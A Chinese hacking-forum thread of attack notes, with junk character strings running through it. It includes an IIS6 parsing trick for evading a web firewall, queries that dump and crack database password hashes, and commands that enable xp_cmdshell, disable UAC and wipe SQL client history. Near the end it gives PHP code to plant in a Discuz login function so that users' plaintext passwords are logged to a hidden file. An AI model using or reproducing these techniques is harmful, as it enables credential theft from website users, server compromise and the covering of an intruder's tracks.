在它下面直接插入即可,记录的密码生成在pwd.txt中,# `7 G+ [ F5 ~2 F7 z
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录; M) g! Y2 Y p+ L8 N z
利用II6文件解析漏洞绕过安全狗代码:* _& M- ]$ ?; r* m( P1 R; F# T
;antian365.asp;antian365.jpg
5 i3 i( L2 Q4 [. _8 A* R: N7 ^, C0 D1 a2 @& j: s8 R
各种类型数据库抓HASH破解最高权限密码!: G! j% a. \* m
1.sql server2000
5 X+ ^! g- N& U$ o7 h) bSELECT password from master.dbo.sysxlogins where name='sa'
. N! \' `; ^ g0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
5 x) h: l W+ m6 r2 P. }2FD54D6119FFF04129A1D72E7C3194F7284A7F3A, y4 ^; d& Y2 H' n* @. w! j
! m* P! @- R# m; v" v- K9 Z6 s
0×0100- constant header; ^! Y+ |: ^6 h: C
34767D5C- salt+ P/ |: _/ [. C+ i- r. o: Q
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
3 ^+ k0 N1 Q1 ~2 L( c: B2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash& O' d8 R* H4 f" w6 ?0 T
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash# s8 p9 M) {$ h8 m; h
SQL server 2005:-% D* K8 F. J, P2 R& o9 D
SELECT password_hash FROM sys.sql_logins where name='sa'" H$ H9 M3 c; b; l# X7 ?7 V
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F4 a# e+ q/ u1 `7 j) N( B& O+ n7 r) }' E
0×0100- constant header
$ v: u8 l; [5 F# U993BF231-salt. g) R8 X4 M! A1 x( x8 C# w5 L: g; x D8 d
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
: A$ `% W B! C- u Mcrack case sensitive hash in cain, try brute force and dictionary based attacks.
: _; H* B, W6 p0 E# L& @, j) Z& O# m
update:- following bernardo’s comments:-
! F/ S. m& f2 P. e, N- `/ l; m& zuse function fn_varbintohexstr() to cast password in a hex string.! L7 M+ T+ @9 H5 M5 A6 o+ u3 D
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
' z; L" @7 G& m) m' q. ]) V
1 W- H5 T1 Z3 j3 Q: |- LMYSQL:-; y8 W% d- [. a& }& K
, k0 I. w# U5 J8 v' QIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
! `7 }$ x6 u* X! R5 n+ j+ k/ o# y2 N& {+ l9 X: u; t b, s7 h
*mysql < 4.1- O" D/ f" X R7 i Q
( E* f3 q4 g) d; L* umysql> SELECT PASSWORD(‘mypass’);7 D: h2 y9 @( N' ?6 |; [* Q8 y; e1 b
+——————–+% f, Y8 K0 V, v$ ?/ X, ~0 Z
| PASSWORD(‘mypass’) |
% A2 m. `$ A, ~8 Y+——————–+
2 J6 A$ l' F+ v5 w* B5 i* j| 6f8c114b58f2ce9e |
& I; H! {& E! _+ a* m' {, w+——————–+
/ H* C, P5 A% l8 b. x
$ S, A- a& }1 f+ N' z*mysql >=4.1
/ \ T' \% u; \4 X% N
: z* l6 M o# imysql> SELECT PASSWORD(‘mypass’);
/ `$ u( I p( v/ p9 C" N" h, P, j7 x+——————————————-+: D4 S' {( [: p% [# I
| PASSWORD(‘mypass’) |+ v' X! P" }& G" h
+——————————————-+/ e \ Q x7 e' _$ N) g% Y
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
4 \ [( E1 g2 ?) A+——————————————-+% }1 R8 i. z% s8 {) B
0 ]" x* i& i# O2 h0 j- ^% ?Select user, password from mysql.user
. @3 V& t9 u0 S1 @7 m/ W3 x% [The hashes can be cracked in ‘cain and abel’: N. j, Z0 P, L& ?) r5 h8 K1 S3 V2 o
1 t" T+ ?. D/ B/ q1 C" x
Postgres:-
3 }, Q$ e5 R" N) F5 F0 W/ rPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)2 c- M7 j* a; G2 N1 I9 A# E; j8 h- R
select usename, passwd from pg_shadow;6 m9 v. A; O$ v% F
usename | passwd
- X# N1 W, q4 {) h. i* [4 g——————+————————————-" m; Z6 ^% l; C3 X: J( Q3 S
testuser | md5fabb6d7172aadfda4753bf0507ed4396# t8 Z, }$ p( X9 l" r
use mdcrack to crack these hashes:-
- u& x+ @ `8 E6 L# ?6 A$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
* {( ?( |) W9 h! B# Y7 s! s( _+ v+ `1 X
Oracle:-% G9 Y' v: r$ m8 E) a N
select name, password, spare4 from sys.user$6 d% G! J4 T; Q* H/ X7 B1 W
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g/ Z% `( b1 d# G6 J. L
More on Oracle later, i am a bit bored….
4 {& F: g; t. ?
1 m3 ^! H$ f- J+ Q, i: }3 P
1 A' {2 Y* c' o _% G3 F A* J5 }在sql server2005/2008中开启xp_cmdshell; `' A% {; }3 C$ U8 ^% l8 B# ^
-- To allow advanced options to be changed.8 O- F8 Z/ C0 Y0 u; [- T% ~* Q4 k
EXEC sp_configure 'show advanced options', 1' H. t% j+ ?1 Q1 H& T0 i8 C m
GO" P* @# v6 p T4 U+ g0 D5 @
-- To update the currently configured value for advanced options.0 I1 N# D: w- h7 Q# \: o x
RECONFIGURE
" x7 `% t: y {- r( j: n0 D6 r, PGO3 x% O$ O# c2 a& p4 Y1 A: m) {
-- To enable the feature.
( S/ Q* G8 U3 ~8 R1 fEXEC sp_configure 'xp_cmdshell', 1( E5 v* p: ~' q; `
GO
, W% ?2 \3 Y3 F' H# W0 l9 K-- To update the currently configured value for this feature.$ E& B, K' ~4 p& q$ }" a/ h8 V' M
RECONFIGURE3 t [6 D3 P2 ~2 N- S
GO
- f. [/ h! M; T7 D5 U/ V1 TSQL 2008 server日志清除,在清楚前一定要备份。
8 I! l& b7 T5 P {3 |如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:0 E# g* S# O: ?8 }0 @
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
/ x& r% X$ X1 E# o$ P# t, k& D( \' G# Y0 W M' h1 }
对于SQL Server 2008以前的版本:
2 @* i) o3 d' P J: zSQL Server 2005:* \1 @- X" t* y' W4 M6 x
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
- I% Q/ d' t+ OSQL Server 2000:
1 }8 M7 f9 W1 K. K+ H. b清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。5 z* ^4 H# q, B6 h
" \! B1 p* E, j3 ]& P3 J
本帖最后由 simeon 于 2013-1-3 09:51 编辑0 ]: ?* O7 v/ _+ D, W
- ?7 z1 P6 G& f% W$ v
3 T9 `+ b2 x$ N5 M- S8 |windows 2008 文件权限修改
4 ]6 [4 e$ g8 ^1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx% e8 k; H' t6 t0 o2 b! |
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
2 e8 q3 S, F: M8 u; U一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,; `, O+ e! K9 c# F% l4 k
1 M! ]0 i9 n3 _7 e" Y$ s
Windows Registry Editor Version 5.000 N+ B8 q- `5 P: ?; D
[HKEY_CLASSES_ROOT\*\shell\runas]4 M; f1 w0 z% D5 S: Q' X! i! c
@="管理员取得所有权"' p' i4 v1 y4 U% k& s z
"NoWorkingDirectory"=""; \( G( g2 g9 t/ m5 t
[HKEY_CLASSES_ROOT\*\shell\runas\command]+ A8 S4 r5 g# u2 v" I
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' X2 E, T4 @5 `, e6 p- G
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( Y4 @5 r2 J7 {) ^. j4 V$ R[HKEY_CLASSES_ROOT\exefile\shell\runas2]/ @7 V/ k. c, ~8 Z& C
@="管理员取得所有权"- \$ g8 k4 @6 W
"NoWorkingDirectory"=""% }/ r8 [/ |/ c7 `" ^ N& d6 K
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]& B1 F: y' m9 P% V
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
/ R" p5 K7 C. D( e"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& L' P! }* f7 W9 O3 j$ b7 U/ I8 @- }
[HKEY_CLASSES_ROOT\Directory\shell\runas]8 p6 F, Q7 D, @
@="管理员取得所有权"
# }$ ?, ] s- v1 A4 m7 z" H"NoWorkingDirectory"=""
+ E. F' a' S2 |. S4 O x: J[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
+ I, F/ |) t) q) e+ T- j+ S" [@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"# _( X$ \( W' s: p* W/ w
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
# d! R) R$ R/ \' O) w6 t1 E+ P" }* O* A s' {
/ h( G- C6 c9 o, w8 qwin7右键“管理员取得所有权”.reg导入
% O B! t0 t6 ~1 C7 N, |二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
9 t! N' m# B: i! o1、C:\Windows这个路径的“notepad.exe”不需要替换0 P0 l: ~, |+ [) P; i+ d4 b
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换( U% m/ p& S3 n5 _
3、四个“notepad.exe.mui”不要管
! t. c9 V) l% K, r* s4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
* k+ i5 m4 i% b& L) |, O0 YC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”+ w! K# y0 [' u# c6 E" f, D
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,! Z" O3 \0 o9 [3 @
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。" j* F- ]/ I' s& p
windows 2008中关闭安全策略:
7 j+ c2 o/ T: [( ^$ Hreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3 X- p& m. S0 `2 `0 d/ N2 d4 g6 i修改uc_client目录下的client.php 在
; e. l1 y( r* F, Mfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
8 c; V* S/ I, t1 K1 _下加入如上代码,在网站./data/cache/目录下自动生成csslog.php) K- {1 W. C! b3 G$ U6 `
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
9 P+ e: G L6 {% C8 sif(getenv('HTTP_CLIENT_IP')) {/ A" x, |: N' B: v8 ?/ E! o* a
$onlineip = getenv('HTTP_CLIENT_IP');
4 ]+ j: \7 I% \/ v n} elseif(getenv('HTTP_X_FORWARDED_FOR')) {& J0 I. B% b6 n' f" Z( j* d
$onlineip = getenv('HTTP_X_FORWARDED_FOR');4 e9 p% ^9 |2 ]1 x: }0 ^$ d/ G: \
} elseif(getenv('REMOTE_ADDR')) {( v9 I( A( B4 f
$onlineip = getenv('REMOTE_ADDR');9 G( f+ w4 e1 ~8 a- |' d
} else {* A1 O) e$ f, S) d' B$ G
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];) s* M/ }8 F# p+ a2 \4 A$ P4 m1 m8 g
}2 j# ~) \" J1 B6 ^+ A6 O
$showtime=date("Y-m-d H:i:s");
3 V# O: o5 ]( `& s' u% S $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
' z2 e7 S \2 m/ G3 i2 I $handle=fopen('./data/cache/csslog.php','a+');% L" n1 `) `9 i: N4 D) \2 v
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对